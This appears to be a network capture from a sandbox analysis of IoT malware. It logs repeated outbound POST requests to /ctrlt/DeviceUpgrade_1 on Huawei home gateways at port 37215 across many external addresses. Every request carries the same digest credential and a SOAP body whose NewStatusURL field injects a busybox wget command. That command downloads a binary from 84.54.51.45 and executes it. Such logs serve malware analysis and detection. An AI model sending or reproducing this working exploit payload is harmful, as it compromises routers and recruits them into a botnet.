                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2196192.168.2.154325041.244.109.4937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671727896 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2197192.168.2.155068041.66.193.1237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671729088 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2198192.168.2.154934441.195.149.6737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671729088 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2199192.168.2.153881641.235.19.18837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671768904 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2200192.168.2.154153441.253.231.21637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671768904 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2201192.168.2.154827041.144.15.23137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671816111 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2202192.168.2.154473041.95.125.10437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671816111 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2203192.168.2.153282441.47.91.9837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671816111 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2204192.168.2.155032641.10.125.13937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671833992 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2205192.168.2.153322241.13.71.25537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671854973 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
